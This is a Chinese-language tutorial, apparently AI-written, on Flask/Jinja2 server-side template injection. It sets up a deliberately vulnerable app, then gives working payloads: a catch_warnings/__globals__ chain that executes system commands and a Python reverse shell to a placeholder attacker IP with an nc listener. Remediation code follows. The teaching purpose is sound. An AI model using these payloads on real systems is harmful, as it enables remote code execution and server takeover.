Flask SSTI（服务器端模板注入）漏洞详解与实战教学<\/strong><\/h3>
一、漏洞概述<\/strong><\/h4>
1.1 什么是SSTI？<\/strong>
服务器端模板注入是一种严重的安全漏洞。当应用程序在渲染用户输入时，未经验证或过滤就将其作为模板代码的一部分<\/strong>进行解析，而非单纯的数据，攻击者便能注入恶意指令，最终可能导致服务器被完全控制。<\/p>
1.2 漏洞产生的根本原因<\/strong>
开发者错误地将用户可控的输入<\/strong>直接拼接<\/strong>到了模板字符串中，然后交由模板引擎渲染。这混淆了“数据”与“代码”的边界。正确的做法应该是将用户输入作为“数据”传递给模板引擎进行变量替换。<\/p>
1.3 涉及的技术栈<\/strong><\/p>

Web框架<\/strong>： Flask（一个轻量级Python Web框架）。<\/li>
模板引擎<\/strong>： Jinja2（Flask默认使用的模板引擎）。<\/li> <\/ul>

二、漏洞原理深度解析<\/strong><\/h4>
2.1 模板引擎的工作机制<\/strong>
模板引擎的核心作用是实现业务逻辑（后端数据）与表现层（前端HTML）的分离。它通过特定的占位符（如Jinja2的 {{ ... }}<\/code>）在模板文件中标记动态内容的位置。当渲染时，引擎会用真实数据替换这些占位符，生成最终的HTML页面。<\/p>
正常情况<\/strong>：Template("Hello {{ name }}").render(name=user_input)<\/code> 用户输入 user_input<\/code> 被视为纯文本数据，安全地插入到 {{ name }}<\/code> 的位置。<\/li> <\/ul> <\/li> 漏洞情况<\/strong>：Template("Hello " + user_input)<\/code> 用户输入 user_input<\/code> 被直接拼接到模板字符串中。如果输入包含Jinja2语法，它将被当作代码<\/strong>执行。<\/li> <\/ul> <\/li> <\/ul> 2.2 从代码执行到命令执行<\/strong> Jinja2模板的强大之处在于它支持复杂的表达式、控制语句（如for<\/code>循环、if<\/code>判断）和访问Python对象的属性。这正是SSTI危害巨大的原因。<\/p> 攻击者可以通过注入的模板代码访问Python的基础对象（如字符串、列表），并利用Python的面向对象特性构建一条调用链<\/strong>，最终调用到能够执行系统命令的危险函数（如os.system<\/code>）。<\/p> 三、漏洞环境搭建与复现<\/strong><\/h4> 3.1 存在漏洞的Flask应用代码<\/strong><\/p> from<\/span> flask import<\/span> Flask, request <\/span><\/span>from<\/span> jinja2 import<\/span> Template # 导入Jinja2的Template类<\/span> <\/span><\/span> <\/span><\/span>app =<\/span> Flask(__name__) <\/span><\/span> <\/span><\/span>@app<\/span>.<\/span>route("\/"<\/span>) <\/span><\/span>def<\/span> index<\/span>(): <\/span><\/span> # 直接从URL参数获取用户输入，未做任何过滤<\/span> <\/span><\/span> name =<\/span> request.<\/span>args.<\/span>get('name'<\/span>, 'guest'<\/span>) <\/span><\/span> <\/span><\/span> # 致命错误：将用户输入直接拼接到模板字符串中<\/span> <\/span><\/span> t =<\/span> Template("Hello "<\/span> +<\/span> name) <\/span><\/span> return<\/span> t.<\/span>render() # 渲染模板<\/span> <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> app.<\/span>run() <\/span><\/span><\/code><\/pre>3.2 漏洞验证与初步利用<\/strong><\/p> 运行上述Python脚本，访问 http:\/\/127.0.0.1:5000<\/code>。<\/li> 基础测试<\/strong>：访问 http:\/\/127.0.0.1:5000\/?name=World<\/code>，页面正常显示 Hello World<\/code>。<\/li> 注入验证<\/strong>：访问 http:\/\/127.0.0.1:5000\/?name={{ 7*7 }}<\/code>。 ** payload**：{{ 7*7 }}<\/code><\/li> 预期结果<\/strong>：如果页面显示 Hello 49<\/code>，则证明注入成功。Jinja2执行了乘法运算，表明用户输入被解析为代码。<\/li> <\/ul> <\/li> <\/ol> 四、 exploitation：构建完整的攻击链<\/strong><\/h4> 目标是利用模板注入执行任意系统命令。关键在于如何从模板的“沙箱”环境中找到并调用os.system<\/code>或类似函数。<\/p> 4.1 攻击链构建思路<\/strong> 利用Python的反射机制，通过一个已知的Python对象（如空字符串''<\/code>或空列表[]<\/code>）逐步访问到包含危险函数的模块。<\/p> 标准攻击步骤：<\/strong><\/p> 获取当前对象的类<\/strong>：<\/p> Payload: {{ ''.__class__ }}<\/code><\/li> 结果： <class 'str'><\/code>。我们知道了这个字符串实例属于str<\/code>类。<\/li> <\/ul> <\/li> 获取该类的父类（基类）<\/strong>：<\/p> Payload: {{ ''.__class__.__base__ }}<\/code><\/li> 结果： <class 'object'><\/code>。在Python中，所有类最终都继承自object<\/code>类。<\/li> <\/ul> <\/li> 获取所有子类<\/strong>：<\/p> Payload: {{ ''.__class__.__base__.__subclasses__() }}<\/code><\/li> 结果：返回一个包含大量类的列表。这些是当前Python环境中所有继承自object<\/code>的类。我们的目标是找到其中一个类，它能帮助我们获取到os<\/code>模块或__builtins__<\/code>（包含eval<\/code>、__import__<\/code>等内置函数）。<\/li> <\/ul> <\/li> <\/ol> 4.2 寻找“跳板类”<\/strong> 在返回的子类列表中，需要寻找一个合适的“跳板”。文章中提到了 catch_warnings<\/code> 类，它是一个常见且稳定的选择。<\/p> 4.3 完整的命令执行Payload<\/strong> 以下Payload用于执行系统命令 id<\/code> 并回显结果：<\/p> {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} <\/code><\/pre> 逐行解释：<\/strong><\/p> {% for c in [].__class__.__base__.__subclasses__() %}<\/code>：遍历所有子类。<\/li> {% if c.__name__ == 'catch_warnings' %}<\/code>：筛选出名为 catch_warnings<\/code> 的类。<\/li> {% for b in c.__init__.__globals__.values() %}<\/code>：获取 catch_warnings<\/code> 类的初始化方法的全局变量字典，并遍历其中的所有值。__globals__<\/code> 是一个关键属性，它包含了函数定义时所在模块的全局符号表。<\/li> {% if b.__class__ == {}.__class__ %}<\/code>：在这些全局变量中，筛选出是字典类型的对象。<\/li> {% if 'eval' in b.keys() %}<\/code>：检查这个字典是否包含 eval<\/code> 这个键。通常，这个字典就是 __builtins__<\/code> 模块。<\/li> {{ b['eval']('__import__("os").popen("id").read()') }}<\/code>：从字典中取出 eval<\/code> 函数，并执行一段Python代码： __import__("os")<\/code>：动态导入 os<\/code> 模块。<\/li> .popen("id")<\/code>：使用 os.popen<\/code> 执行系统命令 id<\/code>。<\/li> .read()<\/code>：读取命令执行的结果。<\/li> 最终，命令执行的结果会通过 {{ ... }}<\/code> 输出到网页上。<\/li> <\/ul> <\/li> <\/ol> 4.4 进阶利用：反弹Shell<\/strong> 为了获得一个交互式的Shell，可以使用更复杂的Payload。以下是使用 python3<\/code> 反弹Shell的示例：<\/p> {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("subprocess").Popen(["python3", "-c", "import socket,os,pty;s=socket.socket();s.connect((\\\"YOUR_IP\\\",YOUR_PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\\\"\/bin\/bash\\\")"], stdout=__import__("subprocess").PIPE, stderr=__import__("subprocess").PIPE)') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %} <\/code><\/pre> 注意<\/strong>：需要将 YOUR_IP<\/code> 和 YOUR_PORT<\/code> 替换为攻击者服务器的IP和监听端口，并在攻击机上使用 nc -lvnp YOUR_PORT<\/code> 命令进行监听。<\/li> <\/ul> 五、漏洞防御方案<\/strong><\/h4> 5.1 根本方法：严格区分代码与数据<\/strong> 永远不要将用户输入直接拼接到模板中。应使用模板引擎的安全传参方式<\/strong>。<\/p> 修复后的安全代码：<\/strong><\/p> from<\/span> flask import<\/span> Flask, request <\/span><\/span>from<\/span> jinja2 import<\/span> Template <\/span><\/span> <\/span><\/span>app =<\/span> Flask(__name__) <\/span><\/span> <\/span><\/span>@app<\/span>.<\/span>route("\/"<\/span>) <\/span><\/span>def<\/span> index<\/span>(): <\/span><\/span> name =<\/span> request.<\/span>args.<\/span>get('name'<\/span>, 'guest'<\/span>) <\/span><\/span> # 将用户输入作为变量n的值传递给模板，而不是拼接<\/span> <\/span><\/span> t =<\/span> Template("Hello {{ n }}"<\/span>) # 模板中使用安全的占位符<\/span> <\/span><\/span> return<\/span> t.<\/span>render(n=<\/span>name) # 通过render参数传入数据<\/span> <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> app.<\/span>run() <\/span><\/span><\/code><\/pre>这样，即使用户输入 {{ 7*7 }}<\/code>，也只会被原样显示为 Hello {{ 7*7 }}<\/code>，而不会被执行。<\/p> 5.2 输入验证与过滤<\/strong> 对用户输入进行严格的校验和过滤，例如：<\/p> 过滤或转义模板语法特殊字符，如 { {<\/code>、} }<\/code>、{%<\/code>、%}<\/code>。<\/li> 使用白名单机制，只允许预期的字符（如字母、数字）通过。<\/li> <\/ul> 5.3 使用模板引擎的安全特性<\/strong><\/p> 沙箱环境<\/strong>： Jinja2等引擎提供沙箱模式，可以限制可访问的函数和属性，但沙箱逃逸技术依然存在，因此不能完全依赖。<\/li> 避免危险函数<\/strong>：确保模板环境中不暴露或导入 os<\/code>、subprocess<\/code> 等危险模块。<\/li> <\/ul> 总结<\/strong> 防御SSTI最有效、最根本的方法就是 “渲染时传参”<\/strong> ，彻底杜绝将用户输入当作代码解析的可能性。其他安全措施应作为深度防御的补充手段。<\/p> 希望这份详细的文档能帮助您透彻理解Flask SSTI漏洞。如果您有任何疑问，随时可以提出。<\/p>